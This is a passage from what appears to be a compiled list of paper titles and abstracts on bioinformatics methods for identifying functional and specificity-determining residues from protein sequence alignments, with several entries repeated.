More generally, it provides an evolutionary perspective for judging the functional or structural role of each residue in protein structure. --- paper_title: RB: Analysis and prediction of functional sub-types from protein sequence alignments paper_content: The increasing number and diversity of protein sequence families requires new methods to define and predict details regarding function. Here, we present a method for analysis and prediction of functional sub-types from multiple protein sequence alignments. Given an alignment and set of proteins grouped into sub-types according to some definition of function, such as enzymatic specificity, the method identifies positions that are indicative of functional differences by comparison of sub-type specific sequence profiles, and analysis of positional entropy in the alignment. Alignment positions with significantly high positional relative entropy correlate with those known to be involved in defining sub-types for nucleotidyl cyclases, protein kinases, lactate/malate dehydrogenases and trypsin-like serine proteases. We highlight new positions for these proteins that suggest additional experiments to elucidate the basis of specificity. The method is also able to predict sub-type for unclassified sequences. We assess several variations on a prediction method, and compare them to simple sequence comparisons. For assessment, we remove close homologues to the sequence for which a prediction is to be made (by a sequence identity above a threshold). This simulates situations where a protein is known to belong to a protein family, but is not a close relative of another protein of known sub-type. Considering the four families above, and a sequence identity threshold of 30 %, our best method gives an accuracy of 96 % compared to 80 % obtained for sequence similarity and 74 % for BLAST. We describe the derivation of a set of sub-type groupings derived from an automated parsing of alignments from PFAM and the SWISSPROT database, and use this to perform a large-scale assessment. The best method gives an average accuracy of 94 % compared to 68 % for sequence similarity and 79 % for BLAST. We discuss implications for experimental design, genome annotation and the prediction of protein function and protein intra-residue distances. --- paper_title: Automatic methods for predicting functionally important residues paper_content: Sequence analysis is often the first guide for the prediction of residues in a protein family that may have functional significance. A few methods have been proposed which use the division of protein families into subfamilies in the search for those positions that could have some functional significance for the whole family, but at the same time which exhibit the specificity of each subfamily (“Tree-determinant residues”). However, there are still many unsolved questions like the best division of a protein family into subfamilies, or the accurate detection of sequence variation patterns characteristic of different subfamilies. Here we present a systematic study in a significant number of protein families, testing the statistical meaning of the Tree-determinant residues predicted by three different methods that represent the range of available approaches. The first method takes as a starting point a phylogenetic representation of a protein family and, following the principle of Relative Entropy from Information Theory, automatically searches for the optimal division of the family into subfamilies. 
The second method looks for positions whose mutational behavior is reminiscent of the mutational behavior of the full-length proteins, by directly comparing the corresponding distance matrices. The third method is an automation of the analysis of distribution of sequences and amino acid positions in the corresponding multidimensional spaces using a vector-based principal component analysis. These three methods have been tested on two non-redundant lists of protein families: one composed by proteins that bind a variety of ligand groups, and the other composed by proteins with annotated functionally relevant sites. In most cases, the residues predicted by the three methods show a clear tendency to be close to bound ligands of biological relevance and to those amino acids described as participants in key aspects of protein function. These three automatic methods provide a wide range of possibilities for biologists to analyze their families of interest, in a similar way to the one presented here for the family of proteins related with ras-p21. --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: Supervised multivariate analysis of sequence groups to identify specificity determining residues paper_content: BackgroundProteins that evolve from a common ancestor can change functionality over time, and it is important to be able identify residues that cause this change. In this paper we show how a supervised multivariate statistical method, Between Group Analysis (BGA), can be used to identify these residues from families of proteins with different substrate specifities using multiple sequence alignments.ResultsWe demonstrate the usefulness of this method on three different test cases. Two of these test cases, the Lactate/Malate dehydrogenase family and Nucleotidyl Cyclases, consist of two functional groups. The other family, Serine Proteases consists of three groups. BGA was used to analyse and visualise these three families using two different encoding schemes for the amino acids.ConclusionThis overall combination of methods in this paper is powerful and flexible while being computationally very fast and simple. BGA is especially useful because it can be used to analyse any number of functional classes. In the examples we used in this paper, we have only used 2 or 3 classes for demonstration purposes but any number can be used and visualised. --- paper_title: Protein sequence alignments: a strategy for the hierarchical analysis of residue conservation paper_content: An algorithm is described for the systematic characterization of the physico-chemical properties seen at each position in a multiple protein sequence alignment. 
The new algorithm allows questions important in the design of mutagenesis experiments to be quickly answered since positions in the alignment that show unusual or interesting residue substitution patterns may be rapidly identified. The strategy is based on a flexible set-based description of amino acid properties, which is used to define the conservation between any group of amino acids. Sequences in the alignment are gathered into subgroups on the basis of sequence similarity, functional, evolutionary or other criteria. All pairs of subgroups are then compared to highlight positions that confer the unique features of each subgroup. The algorithm is encoded in the computer program AMAS (Analysis of Multiply Aligned Sequences) which provides a textual summary of the analysis and an annotated (boxed, shaded and/or coloured) multiple sequence alignment. The algorithm is illustrated by application to an alignment of 67 SH2 domains where patterns of conserved hydrophobic residues that constitute the protein core are highlighted. The analysis of charge conservation across annexin domains identifies the locations at which conserved charges change sign. The algorithm simplifies the analysis of multiple sequence data by condensing the mass of information present, and thus allows the rapid identification of substitutions of structural and functional importance. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. 
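Several of the entries above (the sub-type profile comparison, SPEER and GroupSim approaches) share one core operation: contrasting the residue distribution of a subfamily with that of the remaining sequences at every column. The following sketch implements that operation as a per-column relative entropy; the alignment, subgroup labels and pseudocount are invented for illustration, and the published tools add background frequencies, gap handling and significance estimates.

import math
from collections import Counter

AMINO = "ACDEFGHIKLMNPQRSTVWY"

def distribution(residues, pseudocount=0.1):
    """Pseudocount-smoothed residue distribution over the 20 amino acids."""
    counts = Counter(r for r in residues if r in AMINO)
    total = sum(counts.values()) + pseudocount * len(AMINO)
    return {a: (counts[a] + pseudocount) / total for a in AMINO}

def subfamily_divergence(column, in_group):
    """Relative entropy (bits) of the subgroup's residue distribution from the rest."""
    p = distribution(r for r, m in zip(column, in_group) if m)
    q = distribution(r for r, m in zip(column, in_group) if not m)
    return sum(p[a] * math.log2(p[a] / q[a]) for a in AMINO)

alignment = ["ACDKL", "ACDKL", "ACEKL", "GCERL", "GCERL", "GCDRL"]
in_group = [True, True, True, False, False, False]  # toy subfamily labels
scores = {i: subfamily_divergence(col, in_group) for i, col in enumerate(zip(*alignment))}
for i, s in sorted(scores.items(), key=lambda kv: -kv[1]):
    print(f"position {i}: divergence {s:.2f} bits")

Columns conserved across the whole family score near zero, highly variable columns tend to score low, and columns conserved differently in the two subgroups (the candidate specificity-determining sites) score highest.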
The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Maximum-Likelihood Approach for Gene Family Evolution Under Functional Divergence paper_content: According to the observed alignment pattern (i.e., amino acid configuration), we studied two basic types of functional divergence of a protein family. Type I functional divergence after gene duplication results in altered functional constraints (i.e., different evolutionary rate) between duplicate genes, whereas type II results in no altered functional constraints but radical change in amino acid property between them (e.g., charge, hydrophobicity, etc.). Two statistical approaches, i.e., the subtree likelihood and the whole-tree likelihood, were developed for estimating the coefficients of (type I or type II) functional divergence. Numerical algorithms for obtaining maximum-likelihood estimates are also provided. Moreover, a posterior-based site-specific profile is implemented to predict critical amino acid residues that are responsible for type I and/or type II functional divergence after gene duplication. We compared the current likelihood with a fast method developed previously by examples; both show similar results. For handling altered functional constraints (type I functional divergence) in the large gene family with many member genes (clusters), which appears to be a normal case in postgenomics, the subtree likelihood provides a solution that is computationally feasible and robust against the uncertainty of the phylogeny. The cost of this feasibility is the approximation when frequencies of amino acids are very skewed. The potential bias and correction are discussed. --- paper_title: Separation of phylogenetic and functional associations in biological sequences by using the parametric bootstrap. paper_content: Quantitative analyses of biological sequences generally proceed under the assumption that individual DNA or protein sequence elements vary independently. However, this assumption is not biologically realistic because sequence elements often vary in a concerted manner resulting from common ancestry and structural or functional constraints. We calculated intersite associations among aligned protein sequences by using mutual information. To discriminate associations resulting from common ancestry from those resulting from structural or functional constraints, we used a parametric bootstrap algorithm to construct replicate data sets. These data are expected to have intersite associations resulting solely from phylogeny. 
By comparing the distribution of our association statistic for the replicate data against that calculated for empirical data, we were able to assign a probability that two sites covaried resulting from structural or functional constraint rather than phylogeny. We tested our method by using an alignment of 237 basic helix-loop-helix (bHLH) protein domains. Comparison of our results against a solved three-dimensional structure confirmed the identification of several sites important to function and structure of the bHLH domain. This analytical procedure has broad utility as a first step in the identification of sites that are important to biological macromolecular structure and function when a solved structure is unavailable. --- paper_title: Sequence analysis Multi-RELIEF : a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplemenmtary data are available at Bioinformatics online --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis. Here, we present multi-Harmony, an interactive web sever for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. 
SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/ programs/shmrwww. --- paper_title: Emerging methods in protein co-evolution paper_content: Functional interactions between proteins and within proteins results in co-evolutionary signatures in amino acid sequences that serve as clues to various forms of interdependence. This Review discusses the principles and distinctions of the large range of computational tools to analyse protein co-evolution and the biological insight that they are providing. --- paper_title: Classification of protein families and detection of the determinant residues with an improved self-organizing map paper_content: Using a SOM (self-organizing map) we can classify sequences within a protein family into subgroups that generally correspond to biological subcategories. These maps tend to show sequence similarity as proximity in the map. Combining maps generated at different levels of resolution, the structure of relations in protein families can be captured that could not otherwise be represented in a single map. The underlying representation of maps enables us to retrieve characteristic sequence patterns for individual subgroups of sequences. Such patterns tend to correspond to functionally important regions. We present a modified SOM algorithm that includes a convergence test that dynamically controls the learning parameters to adapt them to the learning set instead of being fixed and externally optimized by trial and error. Given the variability of protein family size and distribution, the addition of this features is necessary. The method is successfully tested with a number of families. The rab family of small GTPases is used to illustrate the performance of the method. --- paper_title: The structure of human neuronal Rab6B in the active and inactive form paper_content: The Rab small G-protein family plays important roles in eukaryotes as regulators of vesicle traffic. In Rab proteins, the hydrolysis of GTP to GDP is coupled with association with and dissociation from membranes. Conformational changes related to their different nucleotide states determine their effector specificity. The crystal structure of human neuronal Rab6B was solved in its 'inactive' (with bound MgGDP) and 'active' (MgGTP gamma S-bound) forms to 2.3 and 1.8 angstrom, respectively. Both crystallized in space group P2(1)2(1)2(1), with similar unit-cell parameters, allowing the comparison of both structures without packing artifacts. Conformational changes between the inactive GDP and active GTP-like state are observed mainly in the switch I and switch II regions, confirming their role as a molecular switch. Compared with other Rab proteins, additional changes are observed in the Rab6 subfamily-specific RabSF3 region that might contribute to the specificity of Rab6 for its different effector proteins. 
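The multi-RELIEF entry above frames specificity-site detection as feature weighting over alignment columns. The sketch below shows the underlying RELIEF update on a toy two-subgroup alignment: each sequence pulls weight toward columns that differ from its nearest neighbour in the other subgroup and match its nearest neighbour in its own subgroup. It is a simplified, assumption-laden illustration, not the published multi-RELIEF implementation, which handles multiple classes, sampling and optional 3D weighting.

def hamming(a, b):
    return sum(x != y for x, y in zip(a, b))

def relief_weights(seqs, labels):
    n_pos = len(seqs[0])
    weights = [0.0] * n_pos
    for i, s in enumerate(seqs):
        others = [(hamming(s, t), j) for j, t in enumerate(seqs) if j != i]
        hit = min((d, j) for d, j in others if labels[j] == labels[i])[1]   # nearest same-class sequence
        miss = min((d, j) for d, j in others if labels[j] != labels[i])[1]  # nearest other-class sequence
        for p in range(n_pos):
            weights[p] += (s[p] != seqs[miss][p]) - (s[p] != seqs[hit][p])
    return [w / len(seqs) for w in weights]

seqs = ["ACDKL", "ACDKL", "ACEKL", "GCERL", "GCERL", "GCDRL"]  # toy alignment
labels = ["sub1", "sub1", "sub1", "sub2", "sub2", "sub2"]      # toy subgroup labels
for p, w in enumerate(relief_weights(seqs, labels)):
    print(f"position {p}: weight {w:+.2f}")

Positions that separate the subgroups accumulate positive weight, invariant positions stay at zero, and positions that vary within a subgroup are penalized.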
--- paper_title: [29] Identification of functional residues and secondary structure from protein multiple sequence alignment paper_content: Publisher Summary This chapter describes a strategy for the hierarchical analysis of residue conservation and the identification of functional residues and secondary structure from protein multiple sequence alignment. Hierarchical methods of alignment cope with large numbers of sequences and give reasonably accurate alignments. Having generated the alignment, the problem is to find out what it can tell us about the protein family. Interpretation of alignments can be, particularly difficult when there are large numbers of sequences to examine. The method allows the residue-specific similarities and differences in physicochemical properties among groups of sequences to be identified quickly. The method also highlights conserved positions across a complete alignment and, thus, can help to identify patterns characteristic of regular secondary structures. The chapter also discusses a procedure for applying these patterns in secondary structure prediction and evaluates their predictive power in six blind secondary-structure predictions. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: Predicting functional residues of protein sequence alignments as a feature selection task paper_content: Determining which residues within a multiple alignment of protein sequences are most responsible for protein function is a difficult and important task in bioinformatics. Here, we show that this task is an application of the standard Feature Selection (FS) problem. 
We show the comparison of standard FS techniques with more specialised algorithms on a range of data sets backed by experimental evidence, and find that some standard algorithms perform as well as specialised ones. We also discuss how considering the discriminating power of combinations of residue positions, rather than the power of each position individually, has the potential to improve the performance of such algorithms. --- paper_title: Using multiple interdependency to separate functional from phylogenetic correlations in protein alignments paper_content: Motivation: Multiple sequence alignments of homologous proteins are useful for inferring their phylogenetic history and to reveal functionally important regions in the proteins. Functional constraints may lead to co-variation of two or more amino acids in the sequence, such that a substitution at one site is accompanied by compensatory substitutions at another site. It is not sufficient to find the statistical correlations between sites in the alignment because these may be the result of several undetermined causes. In particular, phylogenetic clustering will lead to many strong correlations. Result: Ap rocedure is developed to detect statistical correlations stemming from functional interaction by removing the strong phylogenetic signal that leads to the correlations of each site with many others in the sequence. Our method relies upon the accuracy of the alignment but it does not require any assumptions about the phylogeny or the substitution process. The effectiveness of the method wa sv erified using computer simulations and then applied to predict functional interactions between amino acids in the Pfam database of alignments. Availability: The program and supplementary figures tables are available from the site http://www.uhnres.utoronto. --- paper_title: Spial: analysis of subtype-specific features in multiple sequence alignments of proteins paper_content: Motivation: Spial (Specificity in alignments) is a tool for the comparative analysis of two alignments of evolutionarily related sequences that differ in their function, such as two receptor subtypes. It highlights functionally important residues that are either specific to one of the two alignments or conserved across both alignments. It permits visualization of this information in three complementary ways: by colour-coding alignment positions, by sequence logos and optionally by colour-coding the residues of a protein structure provided by the user. This can aid in the detection of residues that are involved in the subtype-specific interaction with a ligand, other proteins or nucleic acids. Spial may also be used to detect residues that may be post-translationally modified in one of the two sets of sequences. --- paper_title: An evolutionary trace method defines binding surfaces common to protein families paper_content: X-ray or NMR structures of proteins are often derived without their ligands, and even when the structure of a full complex is available, the area of contact that is functionally and energetically significant may be a specialized subset of the geometric interface deduced from the spatial proximity between ligands. Thus, even after a structure is solved, it remains a major theoretical and experimental goal to localize protein functional interfaces and understand the role of their constituent residues. 
The evolutionary trace method is a systematic, transparent and novel predictive technique that identifies active sites and functional interfaces in proteins with known structure. It is based on the extraction of functionally important residues from sequence conservation patterns in homologous proteins, and on their mapping onto the protein surface to generate clusters identifying functional interfaces. The SH2 and SH3 modular signaling domains and the DNA binding domain of the nuclear hormone receptors provide tests for the accuracy and validity of our method. In each case, the evolutionary trace delineates the functional epitope and identifies residues critical to binding specificity. Based on mutational evolutionary analysis and on the structural homology of protein families, this simple and versatile approach should help focus site-directed mutagenesis studies of structure-function relationships in macromolecules, as well as studies of specificity in molecular recognition. More generally, it provides an evolutionary perspective for judging the functional or structural role of each residue in protein structure. --- paper_title: RB: Analysis and prediction of functional sub-types from protein sequence alignments paper_content: The increasing number and diversity of protein sequence families requires new methods to define and predict details regarding function. Here, we present a method for analysis and prediction of functional sub-types from multiple protein sequence alignments. Given an alignment and set of proteins grouped into sub-types according to some definition of function, such as enzymatic specificity, the method identifies positions that are indicative of functional differences by comparison of sub-type specific sequence profiles, and analysis of positional entropy in the alignment. Alignment positions with significantly high positional relative entropy correlate with those known to be involved in defining sub-types for nucleotidyl cyclases, protein kinases, lactate/malate dehydrogenases and trypsin-like serine proteases. We highlight new positions for these proteins that suggest additional experiments to elucidate the basis of specificity. The method is also able to predict sub-type for unclassified sequences. We assess several variations on a prediction method, and compare them to simple sequence comparisons. For assessment, we remove close homologues to the sequence for which a prediction is to be made (by a sequence identity above a threshold). This simulates situations where a protein is known to belong to a protein family, but is not a close relative of another protein of known sub-type. Considering the four families above, and a sequence identity threshold of 30 %, our best method gives an accuracy of 96 % compared to 80 % obtained for sequence similarity and 74 % for BLAST. We describe the derivation of a set of sub-type groupings derived from an automated parsing of alignments from PFAM and the SWISSPROT database, and use this to perform a large-scale assessment. The best method gives an average accuracy of 94 % compared to 68 % for sequence similarity and 79 % for BLAST. We discuss implications for experimental design, genome annotation and the prediction of protein function and protein intra-residue distances. --- paper_title: Automatic methods for predicting functionally important residues paper_content: Sequence analysis is often the first guide for the prediction of residues in a protein family that may have functional significance. 
A few methods have been proposed which use the division of protein families into subfamilies in the search for those positions that could have some functional significance for the whole family, but at the same time which exhibit the specificity of each subfamily (“Tree-determinant residues”). However, there are still many unsolved questions like the best division of a protein family into subfamilies, or the accurate detection of sequence variation patterns characteristic of different subfamilies. Here we present a systematic study in a significant number of protein families, testing the statistical meaning of the Tree-determinant residues predicted by three different methods that represent the range of available approaches. The first method takes as a starting point a phylogenetic representation of a protein family and, following the principle of Relative Entropy from Information Theory, automatically searches for the optimal division of the family into subfamilies. The second method looks for positions whose mutational behavior is reminiscent of the mutational behavior of the full-length proteins, by directly comparing the corresponding distance matrices. The third method is an automation of the analysis of distribution of sequences and amino acid positions in the corresponding multidimensional spaces using a vector-based principal component analysis. These three methods have been tested on two non-redundant lists of protein families: one composed by proteins that bind a variety of ligand groups, and the other composed by proteins with annotated functionally relevant sites. In most cases, the residues predicted by the three methods show a clear tendency to be close to bound ligands of biological relevance and to those amino acids described as participants in key aspects of protein function. These three automatic methods provide a wide range of possibilities for biologists to analyze their families of interest, in a similar way to the one presented here for the family of proteins related with ras-p21. --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: Protein sequence alignments: a strategy for the hierarchical analysis of residue conservation paper_content: An algorithm is described for the systematic characterization of the physico-chemical properties seen at each position in a multiple protein sequence alignment. The new algorithm allows questions important in the design of mutagenesis experiments to be quickly answered since positions in the alignment that show unusual or interesting residue substitution patterns may be rapidly identified. 
The strategy is based on a flexible set-based description of amino acid properties, which is used to define the conservation between any group of amino acids. Sequences in the alignment are gathered into subgroups on the basis of sequence similarity, functional, evolutionary or other criteria. All pairs of subgroups are then compared to highlight positions that confer the unique features of each subgroup. The algorithm is encoded in the computer program AMAS (Analysis of Multiply Aligned Sequences) which provides a textual summary of the analysis and an annotated (boxed, shaded and/or coloured) multiple sequence alignment. The algorithm is illustrated by application to an alignment of 67 SH2 domains where patterns of conserved hydrophobic residues that constitute the protein core are highlighted. The analysis of charge conservation across annexin domains identifies the locations at which conserved charges change sign. The algorithm simplifies the analysis of multiple sequence data by condensing the mass of information present, and thus allows the rapid identification of substitutions of structural and functional importance. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: [29] Identification of functional residues and secondary structure from protein multiple sequence alignment paper_content: Publisher Summary This chapter describes a strategy for the hierarchical analysis of residue conservation and the identification of functional residues and secondary structure from protein multiple sequence alignment. Hierarchical methods of alignment cope with large numbers of sequences and give reasonably accurate alignments. Having generated the alignment, the problem is to find out what it can tell us about the protein family. Interpretation of alignments can be, particularly difficult when there are large numbers of sequences to examine. The method allows the residue-specific similarities and differences in physicochemical properties among groups of sequences to be identified quickly. The method also highlights conserved positions across a complete alignment and, thus, can help to identify patterns characteristic of regular secondary structures. The chapter also discusses a procedure for applying these patterns in secondary structure prediction and evaluates their predictive power in six blind secondary-structure predictions. 
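The AMAS-style analyses cited above reason about columns in terms of conserved physico-chemical properties rather than residue identities. The sketch below summarizes each column by the property classes present in each subgroup and flags columns whose subgroups use disjoint classes. The class definitions and data are simplified assumptions for illustration, not the published property sets.

CLASSES = {
    "hydrophobic": set("AVLIMFWC"),
    "polar":       set("STNQYH"),
    "positive":    set("KR"),
    "negative":    set("DE"),
    "special":     set("GP"),
}

def classes_present(residues):
    residues = set(residues)
    return {name for name, members in CLASSES.items() if residues & members}

alignment = ["ACDKL", "ACDKL", "ACEKL", "GCERL", "GCERL", "GCDRL"]
groups = {"sub1": alignment[:3], "sub2": alignment[3:]}  # toy subgroup split
for p in range(len(alignment[0])):
    per_group = {g: classes_present(s[p] for s in seqs) for g, seqs in groups.items()}
    flag = "  <- subgroup-specific property change" if per_group["sub1"].isdisjoint(per_group["sub2"]) else ""
    print(f"position {p}: {per_group}{flag}")

Columns where one subgroup keeps only hydrophobic residues while the other keeps only charged or special residues are the ones such hierarchical conservation analyses highlight for mutagenesis.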
--- paper_title: Evolutionary trace report_maker: a new type of service for comparative analysis of proteins paper_content: Summary: Evolutionary trace report_maker offers a new type of service for researchers investigating the function of novel proteins. It pools, from different sources, information about protein sequence, structure and elementary annotation, and to that background superimposes inference about the evolutionary behavior of individual residues, using real-valued evolutionary trace method. As its only input it takes a Protein Data Bank identifier or UniProt accession number, and returns a human-readable document in PDF format, supplemented by the original data needed to reproduce the results quoted in the report. ::: ::: Availability: Evolutionary trace reports are freely available for academic users at http://mammoth.bcm.tmc.edu/report-maker ::: ::: Contact: {imihalek,ires,lichtarge}@bcm.tmc.edu --- paper_title: Evolutionary Trace Annotation Server: automated enzyme function prediction in protein structures using 3D templates paper_content: Summary:The Evolutionary Trace Annotation (ETA) Server predicts enzymatic activity. ETA starts with a structure of unknown function, such as those from structural genomics, and with no prior knowledge of its mechanism uses the phylogenetic Evolutionary Trace (ET) method to extract key functional residues and propose a function-associated 3D motif, called a 3D template. ETA then searches previously annotated structures for geometric template matches that suggest molecular and thus functional mimicry. In order to maximize the predictive value of these matches, ETA next applies distinctive specificity filters—evolutionary similarity, function plurality and match reciprocity. In large scale controls on enzymes, prediction coverage is 43% but the positive predictive value rises to 92%, thus minimizing false annotations. Users may modify any search parameter, including the template. ETA thus expands the ET suite for protein structure annotation, and can contribute to the annotation efforts of metaservers. ::: ::: Availability:The ETA Server is a web application available at http://mammoth.bcm.tmc.edu/eta/. ::: ::: Contact: [email protected] --- paper_title: Identification of subfamily-specific sites based on active sites modeling and clustering paper_content: Motivation: Current computational approaches to function prediction are mostly based on protein sequence classification and transfer of annotation from known proteins to their closest homologous sequences relying on the orthology concept of function conservation. This approach suffers a major weakness: annotation reliability depends on global sequence similarity to known proteins and is poorly efficient for enzyme superfamilies that catalyze different reactions. Structural biology offers a different strategy to overcome the problem of annotation by adding information about protein 3D structures. This information can be used to identify amino acids located in active sites, focusing on detection of functional polymorphisms residues in an enzyme superfamily. Structural genomics programs are providing more and more novel protein structures at a high-throughput rate. However, there is still a huge gap between the number of sequences and available structures. Computational methods, such as homology modeling provides reliable approaches to bridge this gap and could be a new precise tool to annotate protein functions. 
Results: Here, we present the Active Sites Modeling and Clustering (ASMC) method, a novel unsupervised method to classify sequences using structural information of protein pockets. ASMC combines homology modeling of family members, structural alignment of modeled active sites and a subsequent hierarchical conceptual classification. Comparison of profiles obtained from computed clusters allows the identification of residues correlated to subfamily function divergence, called specificity determining positions. The ASMC method has been validated on a benchmark of 42 Pfam families for which previously resolved holo-structures were available. ASMC was also applied to several families containing known protein structures and comprehensive functional annotations. We will discuss how ASMC improves annotation and understanding of protein family functions by giving some specific illustrative examples on nucleotidyl cyclases, protein kinases and serine proteases. Availability: http://www.genoscope.fr/ASMC/. Contact: [email protected]; [email protected]; [email protected] Supplementary information: Supplementary data are available at Bioinformatics online. --- paper_title: In silico discovery of enzyme-substrate specificity-determining residue clusters. paper_content: The binding between an enzyme and its substrate is highly specific, despite the fact that many different enzymes show significant sequence and structure similarity. There must be, then, substrate specificity-determining residues that enable different enzymes to recognize their unique substrates. We reason that a coordinated, not independent, action of both conserved and non-conserved residues determine enzymatic activity and specificity. Here, we present a surface patch ranking (SPR) method for in silico discovery of substrate specificity-determining residue clusters by exploring both sequence conservation and correlated mutations. As case studies we apply SPR to several highly homologous enzymatic protein pairs, such as guanylyl versus adenylyl cyclases, lactate versus malate dehydrogenases, and trypsin versus chymotrypsin. Without using experimental data, we predict several single and multi-residue clusters that are consistent with previous mutagenesis experimental results. Most single-residue clusters are directly involved in enzyme–substrate interactions, whereas multi-residue clusters are vital for domain–domain and regulator–enzyme interactions, indicating their complementary role in specificity determination. --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results.
